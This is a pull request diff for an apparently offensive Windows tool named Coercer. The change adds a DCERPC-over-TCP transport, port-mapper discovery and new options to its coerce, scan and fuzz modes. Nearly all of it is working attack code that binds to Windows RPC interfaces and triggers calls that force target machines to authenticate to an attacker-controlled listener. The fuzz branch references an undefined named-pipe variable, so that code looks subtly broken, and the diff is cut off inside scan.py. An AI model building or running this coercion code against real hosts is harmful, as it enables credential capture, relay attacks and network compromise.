### PR TITLE
added DCERPC mode

### DIFF
--- a/coercer/__main__.py
+++ b/coercer/__main__.py
@@ -46,12 +46,15 @@ def parseArgs():
     mode_scan_advanced_config.add_argument("--max-http-port", default=65000, type=int, help="Verbose mode (default: False)")
     mode_scan_advanced_config.add_argument("--http-port", default=80, type=int, help="HTTP port (default: 80)")
     mode_scan_advanced_config.add_argument("--smb-port", default=445, type=int, help="SMB port (default: 445)")
+    mode_scan_advanced_config.add_argument("--dce-port", default=135, type=int, help="DCERPC port (default: 135)")
+    mode_scan_advanced_config.add_argument("--dce-ports", default=[], nargs='+', type=int, help="DCERPC ports")
     mode_scan_advanced_config.add_argument("--auth-type", default=None, type=str, help="Desired authentication type ('smb' or 'http').")
     # Filters
     mode_scan_filters = mode_scan.add_argument_group("Filtering")
     mode_scan_filters.add_argument("--filter-method-name", default=[], action='append', type=str, help="")
     mode_scan_filters.add_argument("--filter-protocol-name", default=[], action='append', type=str, help="")
     mode_scan_filters.add_argument("--filter-pipe-name", default=[], action='append', type=str, help="")
+    mode_scan_filters.add_argument("--filter-transport-name", default=["msrpc", "dcerpc"], choices=["msrpc", "dcerpc"], nargs='*', type=str, help="")
     # Credentials
     mode_scan_credentials = mode_scan.add_argument_group("Credentials")
     mode_scan_credentials.add_argument("-u", "--username", default="", help="Username to authenticate to the remote machine.")
@@ -81,12 +84,15 @@ def parseArgs():
     mode_fuzz_advanced_config.add_argument("--min-http-port", default=64000, type=int, help="Verbose mode (default: False)")
     mode_fuzz_advanced_config.add_argument("--max-http-port", default=65000, type=int, help="Verbose mode (default: False)")
     mode_fuzz_advanced_config.add_argument("--smb-port", default=445, type=int, help="SMB port (default: 445)")
+    mode_fuzz_advanced_config.add_argument("--dce-port", default=135, type=int, help="DCERPC port (default: 135)")
+    mode_fuzz_advanced_config.add_argument("--dce-ports", default=[], nargs='+', type=int, help="DCERPC ports")
     mode_fuzz_advanced_config.add_argument("--auth-type", default=None, type=str, help="Desired authentication type ('smb' or 'http').")
     # Filters
     mode_fuzz_filters = mode_fuzz.add_argument_group("Filtering")
     mode_fuzz_filters.add_argument("--filter-method-name", default=[], action='append', type=str, help="")
     mode_fuzz_filters.add_argument("--filter-protocol-name", default=[], action='append', type=str, help="")
     mode_fuzz_filters.add_argument("--filter-pipe-name", default=[], action='append', type=str, help="")
+    mode_fuzz_filters.add_argument("--filter-transport-name", default=["msrpc", "dcerpc"], choices=["msrpc", "dcerpc"], nargs='*', type=str, help="")
     # Credentials
     mode_fuzz_credentials = mode_fuzz.add_argument_group("Credentials")
     mode_fuzz_credentials.add_argument("--only-known-exploit-paths", action="store_true", default=False, help="Only test known exploit paths for each functions")
@@ -113,6 +119,8 @@ def parseArgs():
     mode_coerce_advanced_config.add_argument("--delay", default=None, type=int, help="Delay between attempts (in seconds)")
     mode_coerce_advanced_config.add_argument("--http-port", default=80, type=int, help="HTTP port (default: 80)")
     mode_coerce_advanced_config.add_argument("--smb-port", default=445, type=int, help="SMB port (default: 445)")
+    mode_coerce_advanced_config.add_argument("--dce-port", default=135, type=int, help="DCERPC port (default: 135)")
+    mode_coerce_advanced_config.add_argument("--dce-ports", default=[], nargs='+', type=int, help="DCERPC ports")
     mode_coerce_advanced_config.add_argument("--always-continue", default=False, action="store_true", help="Always continue to coerce")
     mode_coerce_advanced_config.add_argument("--auth-type", default=None, type=str, help="Desired authentication type ('smb' or 'http').")
     # Filters
@@ -120,6 +128,7 @@ def parseArgs():
     mode_coerce_filters.add_argument("--filter-method-name", default=[], action='append', type=str, help="")
     mode_coerce_filters.add_argument("--filter-protocol-name", default=[], action='append', type=str, help="")
     mode_coerce_filters.add_argument("--filter-pipe-name", default=[], action='append', type=str, help="")
+    mode_coerce_filters.add_argument("--filter-transport-name", default=["msrpc", "dcerpc"], choices=["msrpc", "dcerpc"], nargs='*', type=str, help="")
     # Credentials
     mode_coerce_credentials = mode_coerce.add_argument_group("Credentials")
     mode_coerce_credentials.add_argument("-u", "--username", default="", help="Username to authenticate to the machine.")
@@ -184,7 +193,7 @@ def main():
         for target in targets:
             reporter.print_info("Scanning target %s" % target)
             # Checking credentials if any
-            if try_login(credentials, target, verbose=options.verbose):
+            if not "msrpc" in options.filter_transport_name or try_login(credentials, target, verbose=options.verbose):
                 # Starting action
                 action_coerce(target, available_methods, options, credentials, reporter)
 
@@ -193,7 +202,7 @@ def main():
         for target in targets:
             reporter.print_info("Scanning target %s" % target)
             # Checking credentials if any
-            if try_login(credentials, target, verbose=options.verbose):
+            if not "msrpc" in options.filter_transport_name or try_login(credentials, target, verbose=options.verbose):
                 # Starting action
                 action_scan(target, available_methods, options, credentials, reporter)
                 # Reporting results
@@ -209,7 +218,7 @@ def main():
         for target in targets:
             reporter.print_info("Fuzzing target %s" % target)
             # Checking credentials if any
-            if try_login(credentials, target, verbose=options.verbose):
+            if not "msrpc" in options.filter_transport_name or try_login(credentials, target, verbose=options.verbose):
                 # Starting action
                 action_fuzz(target, available_methods, options, credentials, reporter)
                 # Reporting results

--- a/coercer/core/modes/coerce.py
+++ b/coercer/core/modes/coerce.py
@@ -12,6 +12,7 @@ from coercer.network.DCERPCSession import DCERPCSession
 from coercer.structures.TestResult import TestResult
 from coercer.network.authentications import trigger_authentication
 from coercer.network.smb import can_connect_to_pipe, can_bind_to_interface
+from coercer.network.rpc import portmap_discover, is_port_open, can_bind_to_interface_on_port
 
 
 def action_coerce(target, available_methods, options, credentials, reporter):
@@ -25,6 +26,11 @@ def action_coerce(target, available_methods, options, credentials, reporter):
 
     # Preparing tasks ==============================================================================================================
 
+    if "dcerpc" in options.filter_transport_name:
+        if not options.dce_ports:
+            portmap = portmap_discover(target, options.dce_port)
+        else:
+            portmap = {}
     tasks = {}
     for method_type in available_methods.keys():
         for category in sorted(available_methods[method_type].keys()):
@@ -51,6 +57,22 @@ def action_coerce(target, available_methods, options, credentials, reporter):
 
                                 if instance not in tasks[access_type][namedpipe][uuid][version]:
                                     tasks[access_type][namedpipe][uuid][version].append(instance)
+                        elif access_type == "ncacn_ip_tcp":
+                            for access_method in access_methods:
+                                uuid, version = access_method["uuid"], access_method["version"]
+                                for port in options.dce_ports or portmap.get("ncacn_ip_tcp",{}).get("%s v%s"%(uuid.upper(),version),[]):
+                                    if port not in tasks[access_type].keys():
+                                        tasks[access_type][port] = {}
+
+                                    if uuid not in tasks[access_type][port].keys():
+                                        tasks[access_type][port][uuid] = {}
+
+                                    if version not in tasks[access_type][port][uuid].keys():
+                                        tasks[access_type][port][uuid][version] = []
+
+                                    if instance not in tasks[access_type][port][uuid][version]:
+                                        tasks[access_type][port][uuid][version].append(instance)
+
 
     # Executing tasks =======================================================================================================================
 
@@ -60,76 +82,150 @@ def action_coerce(target, available_methods, options, credentials, reporter):
     # Processing ncan_np tasks
     if len(tasks.keys()) == 0:
         return None
-    ncan_np_tasks = tasks["ncan_np"]
-    for namedpipe in sorted(ncan_np_tasks.keys()):
-        if can_connect_to_pipe(target, namedpipe, credentials):
-            print("[+] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % namedpipe)
-            for uuid in sorted(ncan_np_tasks[namedpipe].keys()):
-                for version in sorted(ncan_np_tasks[namedpipe][uuid].keys()):
-                    if can_bind_to_interface(target, namedpipe, credentials, uuid, version):
-                        print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
-                        for msprotocol_class in sorted(ncan_np_tasks[namedpipe][uuid][version], key=lambda x:x.function["name"]):
+    if "dcerpc" in options.filter_transport_name:
+        ncacn_ip_tcp_tasks = tasks.get("ncacn_ip_tcp", {})
+        for port in sorted(ncacn_ip_tcp_tasks.keys()):
+            if is_port_open(target, port):
+                print("[+] DCERPC port '\x1b[1;94m%d\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % port)
+                for uuid in sorted(ncacn_ip_tcp_tasks[port].keys()):
+                    for version in sorted(ncacn_ip_tcp_tasks[port][uuid].keys()):
+                        if can_bind_to_interface_on_port(target, port, credentials, uuid, version):
+                            print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
+                            for msprotocol_class in sorted(ncacn_ip_tcp_tasks[port][uuid][version], key=lambda x:x.function["name"]):
 
-                            exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
+                                exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
+                                
+                                stop_exploiting_this_function = False
+                                for listener_type, exploitpath in exploit_paths:
+                                    if stop_exploiting_this_function:
+                                        # Got a nca_s_unk_if response, this function does not listen on the given interface
+                                        continue
 
-                            stop_exploiting_this_function = False
-                            for listener_type, exploitpath in exploit_paths:
-                                if stop_exploiting_this_function:
-                                    # Got a nca_s_unk_if response, this function does not listen on the given interface
-                                    continue
+                                    exploitpath = generate_exploit_path_from_template(
+                                        template=exploitpath,
+                                        listener=options.listener_ip,
+                                        http_listen_port=options.http_port,
+                                        smb_listen_port=options.smb_port
+                                    )
 
-                                exploitpath = generate_exploit_path_from_template(
-                                    template=exploitpath,
-                                    listener=options.listener_ip,
-                                    http_listen_port=options.http_port,
-                                    smb_listen_port=options.smb_port
-                                )
-
-                                msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
-                                dcerpc = DCERPCSession(credentials=credentials, verbose=True)
-                                dcerpc.connect_ncacn_np(target=target, pipe=namedpipe)
-
-                                if dcerpc.session is not None:
-                                    dcerpc.bind(interface_uuid=uuid, interface_version=version)
+                                    msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
+                                    dcerpc = DCERPCSession(credentials=credentials, verbose=True)
+                                    dcerpc.connect_ncacn_ip_tcp(target=target, port=port)
                                     if dcerpc.session is not None:
-                                        reporter.print_testing(msprotocol_rpc_instance)
+                                        dcerpc.bind(interface_uuid=uuid, interface_version=version)
+                                        if dcerpc.session is not None:
+                                            reporter.print_testing(msprotocol_rpc_instance)
 
-                                        result = trigger_authentication(
-                                            dcerpc_session=dcerpc.session,
-                                            target=target,
-                                            method_trigger_function=msprotocol_rpc_instance.trigger
-                                        )
+                                            result = trigger_authentication(
+                                                dcerpc_session=dcerpc.session,
+                                                target=target,
+                                                method_trigger_function=msprotocol_rpc_instance.trigger
+                                            )
 
-                                        reporter.report_test_result(
-                                            uuid=uuid, version=version, namedpipe=namedpipe,
-                                            msprotocol_rpc_instance=msprotocol_rpc_instance,
-                                            result=result,
-                                            exploitpath=exploitpath
-                                        )
+                                            reporter.report_test_result(
+                                                uuid=uuid, version=version, namedpipe="",
+                                                msprotocol_rpc_instance=msprotocol_rpc_instance,
+                                                result=result,
+                                                exploitpath=exploitpath
+                                            )
 
-                                        if result == TestResult.NCA_S_UNK_IF:
+                                            if result == TestResult.NCA_S_UNK_IF:
+                                                stop_exploiting_this_function = True
+
+                                    if options.delay is not None:
+                                        # Sleep between attempts
+                                        time.sleep(options.delay)
+
+                                    if not options.always_continue:
+                                        next_action_answer = None
+                                        while next_action_answer not in ["C","S","X"]:
+                                            next_action_answer = input("Continue (C) | Skip this function (S) | Stop exploitation (X) ? ")
+                                            if len(next_action_answer) > 0:
+                                                next_action_answer = next_action_answer.strip()[0].upper()
+                                        if next_action_answer == "C":
+                                            pass
+                                        elif next_action_answer == "S":
                                             stop_exploiting_this_function = True
+                                        elif next_action_answer == "X":
+                                            return None
+                        else:
+                            if options.verbose:
+                                print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
+            else:
+                if options.verbose:
+                    print("[!] DCERPC port '\x1b[1;94m%d\x1b[0m' is \x1b[1;91mclosed\x1b[0m!" % port)
 
-                                if options.delay is not None:
-                                    # Sleep between attempts
-                                    time.sleep(options.delay)
+    if "msrpc" in options.filter_transport_name:
+        ncan_np_tasks = tasks["ncan_np"]
+        for namedpipe in sorted(ncan_np_tasks.keys()):
+            if can_connect_to_pipe(target, namedpipe, credentials):
+                print("[+] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % namedpipe)
+                for uuid in sorted(ncan_np_tasks[namedpipe].keys()):
+                    for version in sorted(ncan_np_tasks[namedpipe][uuid].keys()):
+                        if can_bind_to_interface(target, namedpipe, credentials, uuid, version):
+                            print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
+                            for msprotocol_class in sorted(ncan_np_tasks[namedpipe][uuid][version], key=lambda x:x.function["name"]):
 
-                                if not options.always_continue:
-                                    next_action_answer = None
-                                    while next_action_answer not in ["C","S","X"]:
-                                        next_action_answer = input("Continue (C) | Skip this function (S) | Stop exploitation (X) ? ")
-                                        if len(next_action_answer) > 0:
-                                            next_action_answer = next_action_answer.strip()[0].upper()
-                                    if next_action_answer == "C":
-                                        pass
-                                    elif next_action_answer == "S":
-                                        stop_exploiting_this_function = True
-                                    elif next_action_answer == "X":
-                                        return None
-                    else:
-                        if options.verbose:
-                            print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
-        else:
-            if options.verbose:
-                print("[!] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;91mnot accessible\x1b[0m!" % namedpipe)
+                                exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
+
+                                stop_exploiting_this_function = False
+                                for listener_type, exploitpath in exploit_paths:
+                                    if stop_exploiting_this_function:
+                                        # Got a nca_s_unk_if response, this function does not listen on the given interface
+                                        continue
+
+                                    exploitpath = generate_exploit_path_from_template(
+                                        template=exploitpath,
+                                        listener=options.listener_ip,
+                                        http_listen_port=options.http_port,
+                                        smb_listen_port=options.smb_port
+                                    )
+
+                                    msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
+                                    dcerpc = DCERPCSession(credentials=credentials, verbose=True)
+                                    dcerpc.connect_ncacn_np(target=target, pipe=namedpipe)
+
+                                    if dcerpc.session is not None:
+                                        dcerpc.bind(interface_uuid=uuid, interface_version=version)
+                                        if dcerpc.session is not None:
+                                            reporter.print_testing(msprotocol_rpc_instance)
+
+                                            result = trigger_authentication(
+                                                dcerpc_session=dcerpc.session,
+                                                target=target,
+                                                method_trigger_function=msprotocol_rpc_instance.trigger
+                                            )
+
+                                            reporter.report_test_result(
+                                                uuid=uuid, version=version, namedpipe=namedpipe,
+                                                msprotocol_rpc_instance=msprotocol_rpc_instance,
+                                                result=result,
+                                                exploitpath=exploitpath
+                                            )
+
+                                            if result == TestResult.NCA_S_UNK_IF:
+                                                stop_exploiting_this_function = True
+
+                                    if options.delay is not None:
+                                        # Sleep between attempts
+                                        time.sleep(options.delay)
+
+                                    if not options.always_continue:
+                                        next_action_answer = None
+                                        while next_action_answer not in ["C","S","X"]:
+                                            next_action_answer = input("Continue (C) | Skip this function (S) | Stop exploitation (X) ? ")
+                                            if len(next_action_answer) > 0:
+                                                next_action_answer = next_action_answer.strip()[0].upper()
+                                        if next_action_answer == "C":
+                                            pass
+                                        elif next_action_answer == "S":
+                                            stop_exploiting_this_function = True
+                                        elif next_action_answer == "X":
+                                            return None
+                        else:
+                            if options.verbose:
+                                print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
+            else:
+                if options.verbose:
+                    print("[!] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;91mnot accessible\x1b[0m!" % namedpipe)
 

--- a/coercer/core/modes/fuzz.py
+++ b/coercer/core/modes/fuzz.py
@@ -13,6 +13,7 @@ from coercer.structures.TestResult import TestResult
 from coercer.network.authentications import trigger_and_catch_authentication
 from coercer.network.smb import can_connect_to_pipe, can_bind_to_interface, list_remote_pipes
 from coercer.network.utils import get_ip_addr_to_listen_on, get_next_http_listener_port
+from coercer.network.rpc import portmap_discover, is_port_open, can_bind_to_interface_on_port
 
 
 def action_fuzz(target, available_methods, options, credentials, reporter):
@@ -27,47 +28,53 @@ def action_fuzz(target, available_methods, options, credentials, reporter):
     # Preparing pipes ==============================================================================================================
 
     named_pipe_of_remote_machine = []
-    if credentials.is_anonymous():
-        reporter.print_verbose("Cannot list SMB pipes with anonymous login, using list of known pipes")
-        named_pipe_of_remote_machine = [
-            r'\PIPE\atsvc',
-            r'\PIPE\efsrpc',
-            r'\PIPE\epmapper',
-            r'\PIPE\eventlog',
-            r'\PIPE\InitShutdown',
-            r'\PIPE\lsass',
-            r'\PIPE\lsarpc',
-            r'\PIPE\LSM_API_service',
-            r'\PIPE\netdfs',
-            r'\PIPE\netlogon',
-            r'\PIPE\ntsvcs',
-            r'\PIPE\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER',
-            r'\PIPE\scerpc',
-            r'\PIPE\spoolss',
-            r'\PIPE\srvsvc',
-            r'\PIPE\VBoxTrayIPC-Administrator',
-            r'\PIPE\W32TIME_ALT',
-            r'\PIPE\wkssvc'
-        ]
-        if options.verbose:
-            print("[debug] Using integrated list of %d SMB named pipes." % len(named_pipe_of_remote_machine))
-    else:
-        named_pipe_of_remote_machine = list_remote_pipes(target, credentials)
-        if options.verbose:
-            print("[debug] Found %d SMB named pipes on the remote machine." % len(named_pipe_of_remote_machine))
-
-    kept_pipes_after_filters = []
-    for pipe in named_pipe_of_remote_machine:
-        if filter.pipe_matches_filter(pipe):
-            kept_pipes_after_filters.append(pipe)
-    if len(kept_pipes_after_filters) == 0 and not credentials.is_anonymous():
-        print("[!] No SMB named pipes matching filter --filter-pipe-name %s were found on the remote machine." % options.filter_pipe_name)
-        return None
-    elif len(kept_pipes_after_filters) == 0 and credentials.is_anonymous():
-        print("[!] No SMB named pipes matching filter --filter-pipe-name %s were found in the list of known named pipes." % options.filter_pipe_name)
-        return None
-    else:
-        named_pipe_of_remote_machine = kept_pipes_after_filters
+    ports = set()
+    if "msrpc" in options.filter_transport_name:
+        if credentials.is_anonymous():
+            reporter.print_verbose("Cannot list SMB pipes with anonymous login, using list of known pipes")
+            named_pipe_of_remote_machine = [
+                r'\PIPE\atsvc',
+                r'\PIPE\efsrpc',
+                r'\PIPE\epmapper',
+                r'\PIPE\eventlog',
+                r'\PIPE\InitShutdown',
+                r'\PIPE\lsass',
+                r'\PIPE\lsarpc',
+                r'\PIPE\LSM_API_service',
+                r'\PIPE\netdfs',
+                r'\PIPE\netlogon',
+                r'\PIPE\ntsvcs',
+                r'\PIPE\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER',
+                r'\PIPE\scerpc',
+                r'\PIPE\spoolss',
+                r'\PIPE\srvsvc',
+                r'\PIPE\VBoxTrayIPC-Administrator',
+                r'\PIPE\W32TIME_ALT',
+                r'\PIPE\wkssvc'
+            ]
+            if options.verbose:
+                print("[debug] Using integrated list of %d SMB named pipes." % len(named_pipe_of_remote_machine))
+        else:
+            named_pipe_of_remote_machine = list_remote_pipes(target, credentials)
+            if options.verbose:
+                print("[debug] Found %d SMB named pipes on the remote machine." % len(named_pipe_of_remote_machine))
+        kept_pipes_after_filters = []
+        for pipe in named_pipe_of_remote_machine:
+            if filter.pipe_matches_filter(pipe):
+                kept_pipes_after_filters.append(pipe)
+        if len(kept_pipes_after_filters) == 0 and not credentials.is_anonymous():
+            print("[!] No SMB named pipes matching filter --filter-pipe-name %s were found on the remote machine." % options.filter_pipe_name)
+            return None
+        elif len(kept_pipes_after_filters) == 0 and credentials.is_anonymous():
+            print("[!] No SMB named pipes matching filter --filter-pipe-name %s were found in the list of known named pipes." % options.filter_pipe_name)
+            return None
+        else:
+            named_pipe_of_remote_machine = kept_pipes_after_filters
+    if "dcerpc" in options.filter_transport_name:
+        portmap = portmap_discover(target, options.dce_port)
+        for uuid in portmap.get("ncacn_ip_tcp",[]):
+            for port in portmap["ncacn_ip_tcp"][uuid]:
+                ports.add(port)
 
     # Preparing tasks ==============================================================================================================
 
@@ -94,6 +101,17 @@ def action_fuzz(target, available_methods, options, credentials, reporter):
 
                                 if instance not in tasks[access_type][uuid][version]:
                                     tasks[access_type][uuid][version].append(instance)
+                        elif access_type == "ncacn_ip_tcp":
+                            for access_method in access_methods:
+                                uuid, version = access_method["uuid"], access_method["version"]
+                                if uuid not in tasks[access_type].keys():
+                                    tasks[access_type][uuid] = {}
+
+                                if version not in tasks[access_type][uuid].keys():
+                                    tasks[access_type][uuid][version] = []
+
+                                if instance not in tasks[access_type][uuid][version]:
+                                    tasks[access_type][uuid][version].append(instance)
 
     # Executing tasks =======================================================================================================================
 
@@ -105,72 +123,143 @@ def action_fuzz(target, available_methods, options, credentials, reporter):
     # Processing ncan_np tasks
     if len(tasks.keys()) == 0:
         return None
-    ncan_np_tasks = tasks["ncan_np"]
-    for namedpipe in sorted(named_pipe_of_remote_machine):
-        if can_connect_to_pipe(target, namedpipe, credentials):
-            print("[+] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % namedpipe)
-            for uuid in sorted(ncan_np_tasks.keys()):
-                for version in sorted(ncan_np_tasks[uuid].keys()):
-                    if can_bind_to_interface(target, namedpipe, credentials, uuid, version):
-                        print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
+    if "dcerpc" in options.filter_transport_name:
+        ncacn_ip_tcp_tasks = tasks.get("ncacn_ip_tcp", {})
+        for port in ports:
+            if is_port_open(target, port):
+                print("[+] DCERPC port '\x1b[1;94m%d\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % port)
+                for uuid in sorted(ncacn_ip_tcp_tasks.keys()):
+                    for version in sorted(ncacn_ip_tcp_tasks[uuid].keys()):
+                        if can_bind_to_interface_on_port(target, port, credentials, uuid, version):
+                            print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
 
-                        for msprotocol_class in sorted(ncan_np_tasks[uuid][version], key=lambda x: x.function["name"]):
+                            for msprotocol_class in sorted(ncacn_ip_tcp_tasks[uuid][version], key=lambda x: x.function["name"]):
+                                
+                                if options.only_known_exploit_paths:
+                                    exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
 
-                            if options.only_known_exploit_paths:
-                                exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
+                                stop_exploiting_this_function = False
+                                for listener_type, exploitpath in exploit_paths:
 
-                            stop_exploiting_this_function = False
-                            for listener_type, exploitpath in exploit_paths:
+                                    if stop_exploiting_this_function:
+                                        # Got a nca_s_unk_if response, this function does not listen on the given interface
+                                        continue
+                                    if listener_type == "http":
+                                        http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
 
-                                if stop_exploiting_this_function:
-                                    # Got a nca_s_unk_if response, this function does not listen on the given interface
-                                    continue
-                                if listener_type == "http":
-                                    http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
+                                    exploitpath = generate_exploit_path_from_template(
+                                        template=exploitpath,
+                                        listener=listening_ip,
+                                        http_listen_port=http_listen_port,
+                                        smb_listen_port=options.smb_port
+                                    )
 
-                                exploitpath = generate_exploit_path_from_template(
-                                    template=exploitpath,
-                                    listener=listening_ip,
-                                    http_listen_port=http_listen_port,
-                                    smb_listen_port=options.smb_port
-                                )
+                                    msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
+                                    dcerpc = DCERPCSession(credentials=credentials, verbose=True)
+                                    dcerpc.connect_ncacn_ip_tcp(target=target, port=port)
 
-                                msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
-                                dcerpc = DCERPCSession(credentials=credentials, verbose=True)
-                                dcerpc.connect_ncacn_np(target=target, pipe=namedpipe)
-
-                                if dcerpc.session is not None:
-                                    dcerpc.bind(interface_uuid=uuid, interface_version=version)
                                     if dcerpc.session is not None:
-                                        reporter.print_testing(msprotocol_rpc_instance)
+                                        dcerpc.bind(interface_uuid=uuid, interface_version=version)
+                                        if dcerpc.session is not None:
+                                            reporter.print_testing(msprotocol_rpc_instance)
 
-                                        result = trigger_and_catch_authentication(
-                                            options=options,
-                                            dcerpc_session=dcerpc.session,
-                                            target=target,
-                                            method_trigger_function=msprotocol_rpc_instance.trigger,
-                                            listenertype=listener_type,
-                                            listen_ip=listening_ip,
-                                            http_port=http_listen_port
-                                        )
+                                            result = trigger_and_catch_authentication(
+                                                options=options,
+                                                dcerpc_session=dcerpc.session,
+                                                target=target,
+                                                method_trigger_function=msprotocol_rpc_instance.trigger,
+                                                listenertype=listener_type,
+                                                listen_ip=listening_ip,
+                                                http_port=http_listen_port
+                                            )
 
-                                        reporter.report_test_result(
-                                            uuid=uuid, version=version, namedpipe=namedpipe,
-                                            msprotocol_rpc_instance=msprotocol_rpc_instance,
-                                            result=result,
-                                            exploitpath=exploitpath
-                                        )
+                                            reporter.report_test_result(
+                                                uuid=uuid, version=version, namedpipe=namedpipe,
+                                                msprotocol_rpc_instance=msprotocol_rpc_instance,
+                                                result=result,
+                                                exploitpath=exploitpath
+                                            )
 
-                                        if result == TestResult.NCA_S_UNK_IF:
-                                            stop_exploiting_this_function = True
+                                            if result == TestResult.NCA_S_UNK_IF:
+                                                stop_exploiting_this_function = True
 
-                                if options.delay is not None:
-                                    # Sleep between attempts
-                                    time.sleep(options.delay)
-                    else:
-                        if options.verbose:
-                            print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
-        else:
-            if options.verbose:
-                print("[!] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;91mnot accessible\x1b[0m!" % namedpipe)
+                                    if options.delay is not None:
+                                        # Sleep between attempts
+                                        time.sleep(options.delay)
+                        else:
+                            if options.verbose:
+                                print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
+            else:
+                if options.verbose:
+                    print("[!] DCERPC port '\x1b[1;94m%d\x1b[0m' is \x1b[1;91mclosed\x1b[0m!" % port)
+
+    if "msrpc" in options.filter_transport_name:
+        ncan_np_tasks = tasks["ncan_np"]
+        for namedpipe in sorted(named_pipe_of_remote_machine):
+            if can_connect_to_pipe(target, namedpipe, credentials):
+                print("[+] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % namedpipe)
+                for uuid in sorted(ncan_np_tasks.keys()):
+                    for version in sorted(ncan_np_tasks[uuid].keys()):
+                        if can_bind_to_interface(target, namedpipe, credentials, uuid, version):
+                            print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
+
+                            for msprotocol_class in sorted(ncan_np_tasks[uuid][version], key=lambda x: x.function["name"]):
+
+                                if options.only_known_exploit_paths:
+                                    exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
+
+                                stop_exploiting_this_function = False
+                                for listener_type, exploitpath in exploit_paths:
+
+                                    if stop_exploiting_this_function:
+                                        # Got a nca_s_unk_if response, this function does not listen on the given interface
+                                        continue
+                                    if listener_type == "http":
+                                        http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
+
+                                    exploitpath = generate_exploit_path_from_template(
+                                        template=exploitpath,
+                                        listener=listening_ip,
+                                        http_listen_port=http_listen_port,
+                                        smb_listen_port=options.smb_port
+                                    )
+
+                                    msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
+                                    dcerpc = DCERPCSession(credentials=credentials, verbose=True)
+                                    dcerpc.connect_ncacn_np(target=target, pipe=namedpipe)
+
+                                    if dcerpc.session is not None:
+                                        dcerpc.bind(interface_uuid=uuid, interface_version=version)
+                                        if dcerpc.session is not None:
+                                            reporter.print_testing(msprotocol_rpc_instance)
+
+                                            result = trigger_and_catch_authentication(
+                                                options=options,
+                                                dcerpc_session=dcerpc.session,
+                                                target=target,
+                                                method_trigger_function=msprotocol_rpc_instance.trigger,
+                                                listenertype=listener_type,
+                                                listen_ip=listening_ip,
+                                                http_port=http_listen_port
+                                            )
+
+                                            reporter.report_test_result(
+                                                uuid=uuid, version=version, namedpipe=namedpipe,
+                                                msprotocol_rpc_instance=msprotocol_rpc_instance,
+                                                result=result,
+                                                exploitpath=exploitpath
+                                            )
+
+                                            if result == TestResult.NCA_S_UNK_IF:
+                                                stop_exploiting_this_function = True
+
+                                    if options.delay is not None:
+                                        # Sleep between attempts
+                                        time.sleep(options.delay)
+                        else:
+                            if options.verbose:
+                                print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
+            else:
+                if options.verbose:
+                    print("[!] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;91mnot accessible\x1b[0m!" % namedpipe)
 

--- a/coercer/core/modes/scan.py
+++ b/coercer/core/modes/scan.py
@@ -13,6 +13,7 @@ from coercer.structures.TestResult import TestResult
 from coercer.network.authentications import trigger_and_catch_authentication
 from coercer.network.smb import can_connect_to_pipe, can_bind_to_interface
 from coercer.network.utils import get_ip_addr_to_listen_on, get_next_http_listener_port
+from coercer.network.rpc import portmap_discover, is_port_open, can_bind_to_interface_on_port
 
 
 def action_scan(target, available_methods, options, credentials, reporter):
@@ -26,6 +27,11 @@ def action_scan(target, available_methods, options, credentials, reporter):
 
     # Preparing tasks ==============================================================================================================
 
+    if "dcerpc" in options.filter_transport_name:
+        if not options.dce_ports:
+            portmap = portmap_discover(target, options.dce_port)
+        else:
+            portmap = {}
     tasks = {}
     for method_type in available_methods.keys():
         for category in sorted(available_methods[method_type].keys()):
@@ -52,6 +58,21 @@ def action_scan(target, available_methods, options, credentials, reporter):
 
                                 if instance not in tasks[access_type][namedpipe][uuid][version]:
                                     tasks[access_type][namedpipe][uuid][version].append(instance)
+                        elif access_type == "ncacn_ip_tcp":
+                            for access_method in access_methods:
+                                uuid, version = access_method["uuid"], access_method["version"]
+                                for port in options.dce_ports or portmap.get("ncacn_ip_tcp",{}).get("%s v%s"%(uuid.upper(),version),[]):
+                                    if port not in tasks[access_type].keys():
+                                        tasks[access_type][port] = {}
+
+                                    if uuid not in tasks[access_type][port].keys():
+                                        tasks[access_type][port][uuid] = {}
+
+                                    if version not in tasks[access_type][port][uuid].keys():
+                                        tasks[access_type][port][uuid][version] = []
+
